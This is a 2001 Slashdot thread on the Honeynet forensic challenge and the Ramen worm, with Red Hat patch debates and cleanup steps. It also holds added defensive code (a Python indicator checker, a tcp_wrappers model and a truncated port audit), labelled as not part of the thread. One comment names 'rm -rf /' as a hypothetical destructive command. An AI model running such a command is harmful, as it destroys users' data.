Encryption Security

Cracking All The Live Long Day & RH6/7 Worms

BoomMike writes "While the popular media drools over eWEEK magazine's contrived Open Hack Challenge, which offers modest cash prizes for cracking a carefully arranged network, real geeks can compete in the Honeynet Project's new Forensic Challenge, and pick up the trail of a hacker who cracked one of the project's Linux-based honeypots last November. Mount the file system images and pore through the IDS logs to figure out the who, what, where, when, why and how of the attack, and you can win a book. SecurityFocus has the story." In a much related vein to the Honeynet crack RH6.2/7 there's a story on C|Net concerning the "worm" that's a new popular exploit set with the script kiddies on RH 6/7 servers.
  • What if the guy knew it was a honeypot, and he wanted to get caught? What if he wanted you all to mount the file system images, so he could take over your computers? Maybe he'll use you all to mount a DoS attack on slashdot. Oh, the irony!
  • by Majix ( 139279 ) on Wednesday January 17, 2001 @10:48AM (#500627) Homepage
    I think Red Hat should put out a new 7.01 point release with all the security fixes included. If you're doing a fresh install today you actually have to download over 100mb of patches right after you've finished installing! While 100mb isn't anything these days it does take a little while and many newbies probably don't know about up2date etc.

    It would be much easier if they provided updated ISO images (yeah I know I could make them myself, and someone else probably already has). Since Red Hat 7.1 is still a good way off, I think 7.01 would be a good idea.
  • I believe a lot of the cheap CD houses offer RH7.0 with a CD of fixes ... Someone correct me if I'm wrong but isn't Eridani Linux a "Red Hat with the latest fixes"?
  • As others have said, if the rootpack had a simple "rm -rf /" or similarly damaging command in its script, it would be a virus
    Actually, a virus is not distinguished from a worm by its destructive capability, but rather by its method of propagation. A virus is a bit of code that has to be attached to an existing executable program so that it can be run and thus do its work. A worm propagates itself without requiring a "host" executable. The analog is to the biological world, where virii do not duplicate/reproduce except when they are in another cell.

    BdosError

  • very valid point - so, is there a way to change that banner without the recompile? or, even just recompiling the thing to only change the banner should do this particular trick...
  • What does Honeypot want? Cheap forensic analysis on a cracked box?

    Well if you want to try, have a read of the Nov & Dec Dr.Dobbs. It has a pair of articles about recovering deleted data and has pointers to useful tools.
  • Nice wagon circling -- you deserve the karma.

    That having been said, a worm that targeted IIS4's FTP service and W2K's Print Server service, and had nothing to do with the usual Outlook/VBS/Desktop virus targets, would be treated to a 300 post flamefest on Slashdot, even if Microsoft had fixed the exploits months ago. Instead, we have 98 posts currently, most of them relatively demure.

    I'm actually kinda surprised that "Red$at" is getting such kind treatment around here today.
  • RedHat claims that the wu-ftp bug (RHSA-2000-039-02) only affects RH5.2 and RH6.2

    That's because the advisory was issued before RH7 was released. By all accounts, the buggy wu-ftpd still shipped with RH7. It would be rather silly to issue security advisories for releases in the future, wouldn't it?

  • i think you misunderstood - the worm only patches the hole so that this rooted box won't be rooted by someone else anymore, thus keeping it for the original intruder... not so that the hole is just patched out of good will towards humanity...
  • The vulnerabilities being exploited have been documented since at least Redhat 4 days. That they have not been repaired and the packages update is as inexcusable as the assorted Microsoft vulnerabilities.
  • Interesting ... In June of last year, my box got cracked using the exact same exploit, even down to the port 9704.

    The machine that got cracked had nothing on it, it was just a test machine I was setting up.

    When it was cracked, I thought the exploit looked pretty neat until I saw the same exploit over and over again. Damn script kiddie

  • Just slightly off-topic, but CNET doesn't have a "Rant" link so I figured I'd do it here :P There are times when I really despise the media, and this is one of 'em. CNET apparently doesn't understand, or at least doesn't care to share with its readers, the difference between cracking a system and subjecting it to a DDoS attack. Yes, supposedly this new software being "tested" will keep your box from being cracked like a raw egg. But it doesn't, as CNET implies, protect said box from DDoS. Basically, the problem is that there are ignorant people writing these articles, and misinforming the public. But what can ya do?
  • I think the key part was "and such".

    It's easy to turn a vulnerability into a virus. Linux has vulnerabilities. All the vulnerabilities used to create this worm were fixed last October but people still need to install the new RPM before the fixes do any good.

    Personally, I just type apt-get update && apt-get upgrade every couple days... That way all my programs stay fresh. :)

  • There have been what? 2 viruses {or however you wish to say it} for Linux or its apps.. anyone out there have a count of the number of MS viruses out there? I'll take those odds even if this one formatted my system rather than just closing the holes and looking for other systems with a less than attentive admin.
  • if you believe what this guy says on his summary of the worm.

    here [home.net]

  • Actually, you can disable echo in inetd, and you most likely should. Echo provides a nice DoS: one byte sent to it uses two (send and reply) on your net connection, and you don't really need it.

    /*
    *Not a Sermon, Just a Thought
    */
  • However, these are the same things that have vulnerabilities in MS-land, and usually patches have been out. How many times have bugs been found in the NT kernel? Isn't it usually IIS? That is an add-on service.
  • yep, that's it. jonny-5- has defeated the evil admins that have opened up "www.openhack.com". he has a constant dos held down on their shitty servers/internet line.. they can't handle the force of jonny-5- so openhack.com u guys can just fuck off
  • Actually, you don't need to re-install to get rid of it, as it doesn't actually touch any of your binaries. Just boot in "emergency" mode,

    rm -R /usr/src/.poop
    comment out the "asp" stuff in /etc/inetd.conf
    rm /sbin/asp
    change your passwords (an email was sent - not sure what the contents were)
    remove the "asp" line in /etc/rc.d/rc.sysinit

    The ftpd hole was fixed for you, and you also need to make sure rpc.statd is turned off.

    I'd also suggest you go through your logs so you can see who gave you the worm, so you can tell them that they've been 0wn3d.

    Also, _all_ of your index.html files have been replaced by a ramen advertisement.
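The cleanup recipe above lists the worm's leftovers by path. The following is an added example, not code from the thread or from any of the tools it mentions: a Python checker that reports those indicators (the `/usr/src/.poop` directory, `/sbin/asp`, an active `asp` line in `inetd.conf` or `rc.sysinit`, and `index.html` files carrying the "RameN" marker quoted elsewhere in this discussion) under a root directory of your choosing, so it can be pointed at a mounted disk image as well as a live system. It also lists which inetd services are still enabled, which covers the earlier advice to turn off echo. It reports and never deletes; the sample tree it builds is constructed for the demonstration, and the exact `asp` lines in it are assumptions, since the thread only says such lines exist.

```python
import os
import re
import tempfile

# Indicators taken from the cleanup recipe in the thread above. Paths are
# relative to `root` so the check can run against a mounted disk image
# (as in the Forensic Challenge) or a scratch tree built for testing.
RAMEN_PATHS = ("usr/src/.poop", "sbin/asp")
RAMEN_CONFIGS = ("etc/inetd.conf", "etc/rc.d/rc.sysinit")
ASP_TOKEN = re.compile(r"\basp\b")
DEFACEMENT_MARKER = "RameN"   # string the thread reports in replaced index.html files


def active_lines(path):
    """Yield (line_number, text) for non-blank, non-comment lines of a config file."""
    with open(path, errors="replace") as fh:
        for n, line in enumerate(fh, 1):
            text = line.strip()
            if text and not text.startswith("#"):
                yield n, text


def check_ramen(root):
    """Report (do not remove) Ramen indicators under `root`; returns a list of findings."""
    findings = []
    for rel in RAMEN_PATHS:
        if os.path.lexists(os.path.join(root, rel)):
            findings.append("present: /" + rel)
    for rel in RAMEN_CONFIGS:
        path = os.path.join(root, rel)
        if os.path.isfile(path):
            for n, text in active_lines(path):
                if ASP_TOKEN.search(text):
                    findings.append("/%s:%d: %s" % (rel, n, text))
    for dirpath, _dirs, files in os.walk(root):
        if "index.html" in files:
            path = os.path.join(dirpath, "index.html")
            with open(path, errors="replace") as fh:
                if DEFACEMENT_MARKER in fh.read():
                    findings.append("defaced: /" + os.path.relpath(path, root))
    return findings


def inetd_services(root):
    """Service names still enabled in inetd.conf (first field of each active line)."""
    path = os.path.join(root, "etc/inetd.conf")
    if not os.path.isfile(path):
        return []
    return [text.split()[0] for _n, text in active_lines(path)]


def build_sample_tree():
    """Constructed scratch tree mimicking a box that was cleaned up only halfway.
    All contents are made up for the example; only the paths come from the thread."""
    root = tempfile.mkdtemp(prefix="ramen-demo-")

    def put(rel, content):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)

    os.makedirs(os.path.join(root, "usr/src/.poop"))
    put("sbin/asp", "#!/bin/sh\n# placeholder standing in for the worm's listener\n")
    put("etc/inetd.conf",
        "#echo   stream  tcp  nowait  root  internal\n"
        "ftp    stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a\n"
        "asp    stream  tcp  nowait  root  /sbin/asp  asp\n")          # assumed line
    put("etc/rc.d/rc.sysinit", "# ... normal boot script ...\n/sbin/asp &\n")  # assumed line
    put("home/httpd/html/index.html", "RameN Crew--Hackers looooooooooooove noodles.\n")
    put("home/httpd/html/docs/index.html", "<html><body>unchanged page</body></html>\n")
    return root


if __name__ == "__main__":
    demo_root = build_sample_tree()
    for finding in check_ramen(demo_root):
        print(finding)
    print("inetd services still enabled:", inetd_services(demo_root))
```

Run it against `/` on a suspect host, or against the mount point of an image; each finding carries the file and line number so the operator can review before deleting anything.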
  • Actually, it is destructive - it replaces _every_ index.html on your system with an advertisement for Ramen.
  • I think the problem is that most people confuse the "potential" for better code, with "automatic" better code. Just because I release the source code doesn't make it secure. However, you _can_ find programs that have been secured. Open-source does not remove the need for security-conscious people, it just gives them better tools. With source code, if you get 0wn3d, it's your fault. With proprietary code, it's the other guy's fault :)
  • Turning off services is much better than hosts.allow/deny.

    The problem is that most of the distributions started out making an OS for sysadmins, and they can't get it out of their system. Ever heard of a network exploit for Corel Linux? Why not? It's for users, and doesn't have _any_ services running. When someone clicks on "desktop install", that's what they should get. Then you don't have to mess with files like hosts.allow/deny, ftpusers, and stuff like that. If you want to run an FTP site, then you should know how that stuff works, but most desktop users don't even know that they are running an FTP site, and that is the distribution's fault.
  • Wow, you must be one rich SOB. The "moderate" sum for cracking the E-Week box is $50,000.00.

    Moderate to you maybe, but a nice kick in the income ass to me.

  • But then Microsoft have brought this venom on themselves by their anti-competitive practices, so MS loyalists should not be surprised at the venom that is directed at them. RedHat isn't particularly popular with the /. crowd either, but then there are plenty of Linux vendors to choose from, unlike in the Windows market.
  • I tried to include a tiny Perl program ... But it got rejected: "Junk character post". Sorry.
    LOL!

    If you mod this down, be a darling and mod the parent up. And vice versa.

  • that's such a brittle mechanism for determining a vulnerable machine that it could EASILY be defeated by simply changing the banner.
    And it could easily be defeated by patching wu-ftpd. I suppose the general trend of broadcasting your module name and version could be criticised for inviting this kind of attack. It may be worthwhile compiling all of the various ftpd signature strings into your ftpd, and modding it to send a random one each time.
  • by cyber-vandal ( 148830 ) on Wednesday January 17, 2001 @10:51AM (#500652) Homepage
    Yes, although MS driving competition out of the web browser and mail client markets, combined with lying about the abilities of MCSEs makes a virus far more likely to spread as the desktop is virtually the same everywhere and the servers are less secure. That isn't a problem with the OS per se, but more a problem with a lack of competition in the market.
  • Someone was nice enough to put warez on my ftp site (moved from DSL on a small local provider to @home, and got a real job, so I was not watching hard).

    Been watching the IPs trying to connect through the firewall log, and came upon a site that was now obviously cracked, with the "RameN Crew--Hackers looooooooooooove noodles."
    Sent a message to the abuse contact, but never heard back. Many of the IPs attempting to connect have been cracked.

    Maybe we should put a few more honeypots out on the big cable and DSL providers.
  • Are you sure they kept the holes open? Wuftpd is fixed out of the box for 7.0 and there is an update for LPRng.
  • by Scoria ( 264473 ) <slashmail@ i n i t i a lized.org> on Wednesday January 17, 2001 @11:09AM (#500655) Homepage
    The "myth" isn't so untrue. Remember, you have to have vulnerable versions of rpc.statd and wu-ftpd installed/running for this 'worm' to gain access to the machine. That's really the system admin's fault for not keeping up to date.

    Linux and other *nixish OSes are fairly "virus-resistant" (no OS is "virus-proof") as long as you don't run the virus as root, apply the patches for known security issues, and basically do your job as a sysadmin...
  • That AC and SealBeater both had extremely good points. A worm is totally different from a virus anyway. (I replied to the guy's post that *nix was virus-resistant being a myth, not that *nix was worm-resistant. ;))

    I don't even think something like this would even require special privileges unless the machine was extremely restricted...
  • This is an interesting ecological approach to the security problem though. :-)

    A worm that has the sole job of wandering around and fixing the exploit wherever it finds it and using the box for a little while to find other exploitable boxes, then moving on.

  • For several reasons, this seemingly-great "set a worm to fix a wormhole" idea is NOT useful.

    For starters, consider this scenario:
    1. You know your machine is vulnerable, so you check out its wu-ftpd and rpc.statd binaries and the various logfiles. Whoa, there are worm tracks here! How do you KNOW (not just suspect, KNOW) whether the "bad" worm or the "good" worm was here?

    2. Assume that the "good worm" has been coded to announce and identify itself. A) Most victims won't be able to judge whether to believe it, and B) the forthcoming "bad worm variant 2" will pretend to be the "good worm" anyway, so the ID cannot be trusted in the first place. The "bad worm variant 3" will be even better at hiding its damage while pretending to be the "good worm".

    The net result: Systems hit by the "good worm" will have to be cleaned up and rebuilt just like systems hit by the "bad worm", unless the sysop/user is too clueless to notice the presence of either one. Thus, the "target audience" for this hypothetical white-hat is limited to clueless users who haven't already been hit by the "bad worm". To say nothing of the lawsuits unleashed by offended sysops who had to clean systems "your" worm "attacked".
  • Thats because you use your +2 bonus on comments that don't deserve it. Like the one you just posted. (I'm not that moderator though. Can't say I wouldn't like to be. *grin*)

    That may be true... *shrug*.. I keep forgetting I've got +2, I spent so long at 1... (and I'll be back there soon at this rate... :)

    But oh, what a ride... burn, karma, burn.. :)

  • If this were a Microsoft product, many slashdot readers would start saying "This is what you get" and "M$ sucks!"

    In reality, most security issues with Windows are of the same ilk: Admins that haven't a clue as to what they are doing and manage to fsck everything up and leave holes wide open.

    Next time you read about some hole in Windows, or are tempted to say something smug about Windows 2000 security: Just remember this.... Nobody likes a smart ass, especially a hypocritical one :)


    -
    The IHA Forums [ihateapple.com]
  • I'm getting a bit worried, that since this worm is out there.. some script kiddie is going to get a copy of it, and "evolve" the damn thing.

    Maybe make it more damaging... maybe have it report the hacked IP #'s via IRC, or some other medium... And also have it open up a few other holes on each system, before it goes along its merry way...

    I shudder each time I think about this happening to all of the unsecured RH 6.2/7 boxes setup on all of those cable modems/DSL lines out there. (High bandwidth availability+unsecure box=Nasty Mess)

    A few friends of mine run default RH setups on their DSL lines.. I might be overreacting, but I sent a few panic stricken emails out to them with links to the worm's analysis, and links to download the patched RPMs.. (plus a personal rant about setting up IPCHAINS, and such..)

    Call me a worrywart, but I really don't want to see this thing get out of hand...

  • This wu-ftpd bug was widely reported in June and observing system admins plugged it already. According to CERT's security advisory [cert.org] older versions of proftpd also required updating.
  • You are grossly misinformed. Did you even read the Honeynet page? Their project is to take a cracked box (actually disk dumps of) and piece together the "who, what, when, how, and maybe even why" it was cracked. It's a learning experience, not a cracking exercise.

    Perhaps you should read the article before you post such flamebait.

  • I'm confused. When SDMI came out and said to us all "crack our shitty standard for us," the community cried foul and denounced the competition as doing the dirty-work of the evil SDMI people. Yet when the Honeynet and OpenHack people come out and say the same thing (except that this time we're doing RH's work), it's praised as a cool way to show off your l33t hax0ring skillz. What's the deal? Do we like the latter because it contains those five magic letters: L-I-N-U-X, but denounce the former because it would take away our "right" to tradeable and copyable MP3s (which is a whole separate issue)? The purpose shouldn't matter; this issue is that of doing the security-checking of another company.

    I'm confused, people. Which one is it? Yes or No for hack contests?

  • Upon reviewing the excellent technical summary over at Securityfocus [securityfocus.com], we found that Immunix [immunix.org]'s FormatGuard [immunix.org] stops all three of the exploits that Ramen uses: Crispin
    ----
    Crispin Cowan, Ph.D.
    Chief Research Scientist, WireX Communications, Inc. [wirex.com]
    Immunix [immunix.org]: Free Hardened Linux Distribution
  • I've helped lots of people get to Linux actually. They do need their hands held until they can get the hang of things. It's not intuitive for most people to immediately install an operating system and come to the realization that the first thing they must do is secure it. This is a problem that seriously annoys me about Red Hat and some other Linux distros, as people should only need to learn about securing services if they want to run them. When I first learned Linux back in 96, I was running a horribly insecure system with every service running. I didn't even know how to update it. It pisses me off that Linux vendors don't accommodate new users who don't know better yet.

    But what I really don't understand is why you're upset.
    ---
  • When I first decided to leave my box on 24-7, and connected to the Internet, I was naive enough to think since I had nothing important to offer, no one would bother hacking it.

    I got hacked though through the Wu-ftp bug, which I was aware of -- but like I said, I didn't think anyone would consider my stupid box worth attacking. Fortunately, they didn't do much damage. They deleted the /usr/bin directory then appeared to have left. I deleted all accounts and changed passwords just in case it was more than just flexing muscles. I think they just wanted to take it offline, since it was running an Eggdrop on IRC. I'm glad they did it though, and that they kept trying to break in for weeks after that (I could tell from looking at the logs.) It helped show a newbie what to do and what not to do. I would have been a lot more upset though if they deleted some of my important data.
  • Thanks for the information. Now that I know what to look for I can check out the few systems that I have installed.

    I won't need the perl program as I'll fix any holes that may be open.
  • Yes you are, new users. Sure you and most people here know all that stuff but frankly I didn't even know there /was/ such a thing as a hosts.allow or a hosts.deny file until someone started scanning my system. I wouldn't have even noticed if not for something on SlashDot talking about IPchains. I turned it on and wow.. the things I discovered. I did a full reload in case I had been cracked and set it back up, I found out about the hosts.allow and deny so I tried to set it up. Unless you already know what you are doing it is rather hard to find out the format the two files need to be in. Let's face it, a lot of clueless people are getting into Linux and I was one of them. We need to put out something that covers the things people here assume everyone already knows. I thought I had my system closed through the deny and allow files for a week before I discovered that I had the wrong format and they were doing nothing. I have corrected it now but thanks to this ramen problem I have discovered that I needed to do more {no I haven't been hit.. I at least know to keep up-to-date}. How many of you knew on your first install of Linux that you had to change the hosts.allow and the hosts.deny? How many of you knew the format to use? How many of you knew that you could add anonymous to ftpusers to close anonymous FTP? I know I didn't know any of this when I first started. I am learning and we need to stop bashing those that don't know and help them find out. Remember even /you/ had to learn this at one time. You were not born all knowing.
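The poster above had hosts.allow and hosts.deny in the wrong format for a week and they "were doing nothing", which is exactly how tcp_wrappers behaves: a line without the `:` separator matches nothing, and a client that matches neither file is let in. The block below is an added example, not part of the thread and not the tcp_wrappers code itself: a simplified Python model of how tcpd evaluates `daemon_list : client_list` entries (ALL, LOCAL, `.domain`, `n.n.n.`, `net/mask` and EXCEPT), with constructed sample files so you can see the difference between a well-formed hosts.deny and one with the separator missing. KNOWN/UNKNOWN/PARANOID, shell-command fields and the `user@host` forms are assumed out of scope.

```python
import ipaddress

# Simplified evaluation of tcp_wrappers hosts.allow / hosts.deny:
# "daemon_list : client_list" per line, lists separated by spaces or commas,
# a trailing backslash continues a line, '#' starts a comment.


def parse_rules(text):
    """Return a list of (daemon_tokens, client_tokens). Lines without the ':'
    separator are skipped, which is what makes a mis-formatted file match nothing."""
    rules, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            pending.append(line[:-1])
            continue
        pending.append(line)
        fields = " ".join(pending).split(":")
        pending = []
        if len(fields) < 2:
            continue  # malformed entry: no daemon/client separator
        daemons = fields[0].replace(",", " ").split()
        clients = fields[1].replace(",", " ").split()
        rules.append((daemons, clients))
    return rules


def list_match(tokens, matcher):
    """'a b EXCEPT c d' matches when the left list matches and the right does not."""
    if "EXCEPT" in tokens:
        i = tokens.index("EXCEPT")
        return list_match(tokens[:i], matcher) and not list_match(tokens[i + 1:], matcher)
    return any(matcher(t) for t in tokens)


def client_match(pattern, host, addr):
    if pattern == "ALL":
        return True
    if pattern == "LOCAL":                 # hostname without a dot
        return "." not in host
    if pattern.startswith("."):            # domain suffix
        return host.endswith(pattern)
    if pattern.endswith("."):              # leading octets of an address
        return addr.startswith(pattern)
    if "/" in pattern:                     # net/mask, mask as dotted quad or prefix length
        try:
            return ipaddress.ip_address(addr) in ipaddress.ip_network(pattern, strict=False)
        except ValueError:
            return False
    return pattern in (host, addr)


def access_allowed(daemon, host, addr, allow_text, deny_text):
    """tcp_wrappers order: first match in hosts.allow grants, then first match
    in hosts.deny refuses, otherwise access is granted."""
    def daemon_match(pattern):
        return pattern in ("ALL", daemon)

    for rules, verdict in ((parse_rules(allow_text), True), (parse_rules(deny_text), False)):
        for daemons, clients in rules:
            if list_match(daemons, daemon_match) and \
               list_match(clients, lambda p: client_match(p, host, addr)):
                return verdict
    return True


# Constructed sample files for the demonstration.
ALLOW = """\
# hosts.allow (constructed example)
sshd: 192.168.1. EXCEPT 192.168.1.99
in.ftpd: LOCAL, .example.org
ALL: 127.0.0.1
"""
DENY = "ALL: ALL\n"
BROKEN_DENY = "ALL ALL\n"    # separator missing, so this file denies nothing


if __name__ == "__main__":
    for daemon, host, addr in [("sshd", "pc1.home", "192.168.1.5"),
                               ("sshd", "pc2.home", "192.168.1.99"),
                               ("in.telnetd", "evil.example.net", "10.0.0.1")]:
        good = access_allowed(daemon, host, addr, ALLOW, DENY)
        broken = access_allowed(daemon, host, addr, ALLOW, BROKEN_DENY)
        print(daemon, host, addr, "allowed" if good else "denied",
              "/ with broken hosts.deny:", "allowed" if broken else "denied")
```

The last sample case is the one that matters for the poster's situation: with `ALL: ALL` in hosts.deny the unlisted telnet client is refused, with `ALL ALL` it is let straight through. The "deny everything, then allow what you need" pattern only works when the deny file parses.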
  • My firewall is logging one or 2 attempts at port 111 each day, and slightly more attempts to access my non-existent FTP server ....
  • The purpose shouldn't matter; this issue is that of doing the security-checking of another company.
    The purpose may not matter to you, but it sure matters to me. The purpose is everything in this distinction. eWeek are saying "Hey, come help us test the security on these servers". Honeynet are saying "Hey, come learn about tracking down crackers". SDMI were saying "Hey, come help us fuck you over in the future".
  • Points one and two attempt to refute the remote possibility that 'benevolent involuntary root patching' (Or BIRP, as I like to call it - excuse me) could gain credence as a legitimate tactic for updating daemons. You're right, but consider this scenario:

    A 'good worm', nearly identical to this one, is periodically distributed from an unknown location, armed with the latest and most popular exploit and the correct scripting to retrieve the binaries to fix the vulnerability. It compromises the system using the exploit, silently fixes the problem, propagates itself for a fixed amount of time, and rm's itself from the box.

    And, in the grand tradition of survival of the fittest: the real sysadmins will have already patched, or will be rooted and do a clean rebuild once they notice. The clueless users will be protected from raining DDOS and IRC bot madness onto their fellow Internet denizens for another day.

    There's nothing like being owned to make you a better sysadmin, and this method ensures that no one else will hijack your system through the same exploit while you're waiting to notice that something fishy has gone on. Morally, this argument doesn't hold water, but practically, it could eliminate a whole class of script kiddie problems before they start, by harnessing the power of the exploit for something beneficial.

  • Has anyone managed to unsubscribe once they found your email?

    I used to have a free subscription to macweek, which seems to be where they got the email address they use. They took it on themselves to take this as consent to receive eweek a couple of years later. I've emailed them demanding that they stop. I've sent abuse complaints upstream. Nothing seems to work.

    For some reason, I doubt that firms that build their subscription numbers this way have enough of a clue to tell me anything interesting . . .
  • There goes the assertion/urban myth that Linux was proof against virii and such.

    Look at the crack, it exploited wu-ftpd. Anyone dumb enough to run that program with pathetic security deserves to be cracked. Run something like ProFTPd if you need FTP, or even better, the Linux port of OpenBSD's FTPd.

    Also, use a good distribution (like ROCK Linux [rocklinux.org]). Or at the very least, Mandrake.

  • Thank god - someone else on these forums that isn't linux/free software brainwashed. ALL OSes have their weakness. I still maintain the reason Linux _seems_ so secure and virus free is _because_ there has been little reason to crack/hack. It has little penetration on the desktop. It has little penetration for corporate file servers. It's only recently that it's become popular for web servers (and I mean corporate, not your bedroom, before someone fires at me) and, ta-da! cracks/viruses appear. I don't think it's any better or any worse than windows. Now, M$ does suck, but because of business practices, not software.
  • by wiredog ( 43288 ) on Wednesday January 17, 2001 @09:45AM (#500676) Journal
    It's in rpc.statd and wu-ftp. More info at CERT [cert.org]
  • You forgot that if you have a real problem, you can't demand support from anyone.
    You forgot that no one makes much money programming under Linux
    You forgot that the reason there's been little hacking/virusing of Linux is because there are so few linux boxes out there compared to MS boxes. (this one's my favorite 8) )
    Who the hell wants to base the future of their company on free software? Only morons.

    I think that about sums it up.
  • by 2nd Post! ( 213333 ) <{ten.llebcap} {ta} {raebdnug}> on Wednesday January 17, 2001 @09:46AM (#500678) Homepage
    There goes the assertion/urban myth that Linux was proof against virii and such.

    I would think a *horrible* vector would be one that alternated Windows/Linux targeting.

    A Windows virus that targets Linux, transmutes itself, then looks for other Windows machines on the network.

    Rinse, lather, and repeat.

    Geek dating! [bunnyhop.com]
  • You never know what kinds of backdoors and trojans have been left behind when you were owned. Nor will your logs really help you, as root can change them however to cover his tracks.
  • by marks ( 12185 ) on Wednesday January 17, 2001 @09:53AM (#500680) Homepage
    LinuxSecurity.com [linuxsecurity.com] is offering bandwidth to download the images at http://honeynet.linuxsecurity.com/ [linuxsecurity.com]

    A project such as this does such a good job of exposing users to the methodologies of the black hat community. This is a great project for anyone who has ever been hacked or might be hacked in the future. It's an excellent idea to play with a compromised system to see what one looks like, what gets "messed with" and what needs to be fixed.

    -mark
  • Game Boyeeeeeeeeee!?

    if you have a real problem, you can't demand support from anyone.

    Have you ever had a "real problem"? At my last job, about 1999, a whole string of win 95 machines blew up. Whose problem was it? It was our problem. What was the fix? Buy Win 98. Some support that was. I wish it was as easy as apt, downloading a patch, or even ordering a $4 CD. Oh yeah, about 1 man year's worth of work was lost between them all.

    You forgot that no one makes much money programming under Linux

    Life's a bitch. We can't all be like Bill Gates and fuck the world over. I'm happy enough making an honest living, how about you? I'd go into consulting if I were you. There are plenty of angry MS customers all happy to pay for your time.

    Who the hell wants to base the future of their company on free software? Only morons.

    Free software is the future. Get used to it or perish.

  • by fizbin ( 2046 ) <martin@@@snowplow...org> on Wednesday January 17, 2001 @09:57AM (#500682) Homepage

    This worm has been discussed on the incidents (not bugtraq, as C|Net says) mailing list.

    It's basically a bunch of existing tools snapped together by some brute-force driver scripts.

    My analysis is at http://members.home.net/dtmartin24/ramen_worm.txt [home.net]. Fifteen minutes of fame, here I come!

  • The vulnerabilities being exploited have been documented since at least Redhat 4 days.

    That's an outright lie. Care to back it up with some proof?
    The wu-ftpd vulnerability used by these worms is with wu-ftpd versions prior to 2.6.0, and this vulnerability affected every single Linux distribution that included wu-ftpd (most do). Guess what? The hole was discovered, and wu-ftpd 2.6.0 released, after Red Hat 6.2 had been released for some time. An updated wu-ftpd 2.6.0 package was issued as a security fix for Red Hat 6.2 [redhat.com] by Red Hat shortly thereafter.

    The LPRng problem was detected very shortly after Red Hat 7 was announced. A fix was released immediately [redhat.com].

    That they have not been repaired and the packages update is as inexcusable as the assorted Microsoft vulnerabilities.

    Please check your facts before spouting off such FUD and lies. Or maybe I just responded to a troll, posting at +2...

  • I'm actually kinda surprised that "Red$at" is getting such kind treatment around here today.

    It's spelled "Red Hat". Would you please care to explain why you write that name with a dollar sign?

  • I know about computers.

    What would I want a lady for??

    And while I'm on the subject, security is *both* product *and* process. Sure, I'd be stupid not to have the latest patches and train my users. But I'd also be better off not allowing them to use MS Outlook, and IE (remember the scripting bug [l0pht.com] that allowed one to catch a virus from simply browsing the web?)
    ---------------------------
  • Should I work on cracking a machine, and get $50,000 crisp US Dollars, or should I work on finding who cracked a machine, and get a 10 dollar book. Hm. This is a hard decision.

  • by rwm311 ( 24383 ) on Wednesday January 17, 2001 @10:06AM (#500687) Homepage
    The point of the Honeynet Project is to raise awareness and teach the fundamentals of forensics. The book is just a "job well done" and pat on the back.

    The OpenHack challenge is just another one of those crack-this-box challenges which you see every month or so. Not to take anything away from it, but I find forensics much more interesting. What do you find more interesting: trying to crack a box, or trying to produce a cost-analysis report and details on _who_ cracked a box. I'll take the forensics any day.

    rwm

  • by Bonker ( 243350 ) on Wednesday January 17, 2001 @10:09AM (#500688)
    Since what makes Windoze a popular target for Virus and Worm hackers is its popularity. Since the popularity of Linux is growing (RH in particular as the distro most well known outside the hacker community), it was only a matter of time until someone started exploiting security flaws that plague non-experienced user/administrators.
  • How come the person who successfully hacks a system can win $50,000 while in an unrelated contest the person who can track down a hacker wins a copy of McGraw-Hill's Hacking Exposed, a $28 value?

    Because it's generally easier to sell someone a security system to keep your house from being broken into, than a camera that will only tell you where they went after they left.

  • by Ringwraith ( 230940 ) on Wednesday January 17, 2001 @10:10AM (#500690)
    If this was a story about MS2000 or something, it would be full of comments about how crappy it is. Now it's a story on Linux, and all anyone can talk about is how "it really isn't that bad" and "worms happen." It "really isn't that bad" because it wasn't made to destroy anything--odds are, the next one will be.
  • by Hard_Code ( 49548 ) on Wednesday January 17, 2001 @10:12AM (#500691)
    Cracking All The Live Long Day & RH6/7 Worms

    The title immediately conjured an image of internet worms, self-replicating, and using host machines to number crunch (in the distributed.net case, "crack"). Imagine a Seti@home or distributed.net worm.

    Now *that* would be a decent worm. ;)

    "Why are these processes eating up all the CPU! Why are they talking to setiathome.ssl.berkeley.edu!"
  • The 'after-the-hack' is more interesting, but if you are just going after the prize..

    Just cracking the box is easy. All you have to do is just find the one patch the admin did not install, and then use that, toss a wedge in it, and soon you have r00t.

    Trying to find out who put that wedge in place is a little more difficult. It takes skill, knowledge, and some luck.

    By the time I post this, I am sure it will be redundant, but ah well, I won't post with score bonus.

  • by e_n_d_o ( 150968 ) on Wednesday January 17, 2001 @11:45AM (#500693)
    I still don't understand why every network service isn't turned off by default. If you need it, you better know how to keep it secure. If you know how to keep it secure, chances are you know how to turn it on.

    AFAIK, any normal RH Linux box needs these system services:

    crond
    keytable
    random
    syslogd
    xfs (if running X)

    A box with this config will produce the following "netstat -l" has no externally open ports except echo. The only exception to this is when running X, port 6000 will be opened (personally I firewall this).

    The only thing that MIGHT want to be turned on by default is SSH. But there's really no reason that the user shouldn't have to do even this themselves.

    The problem is obviously the entry-level Unix/mid-level MS users who are starting to use Linux. They need their hands held. So put a $!@#$ memo in the installer that says to read "services.txt" or something to get your system services going. Or, perhaps RH should open a web browser with a "Configuring Services" FAQ when you login to X as root (most people do this, annoying enough).
    ---
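The "netstat -l" check in the comment above is the one most admins would want to script. The following is an added example, not code from the thread: a small POSIX shell audit that reads "netstat -ln"-style output and prints every socket bound to something other than loopback, so a box that is supposed to expose only echo (and maybe port 6000 for X) can be checked at a glance. The sample netstat output embedded in it is constructed, not captured from a real host.

```shell
#!/bin/sh
# Added example: flag listening sockets that are reachable from the network.
# Loopback-only sockets (127.x, ::1) are ignored; everything else is reported.

# Constructed sample of "netstat -ln" output (not from a real machine).
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:7               0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN
udp        0      0 0.0.0.0:514             0.0.0.0:*'

# external_listeners: read "netstat -ln" output on stdin and print
# "proto port" for each socket bound to a non-loopback address.
external_listeners() {
    awk '
        $1 !~ /^(tcp|udp)/ { next }                # skip header lines
        $4 ~ /^127\./ || $4 ~ /^::1:/ { next }     # loopback-only is fine
        { port = $4; sub(/.*:/, "", port); print $1, port }
    '
}

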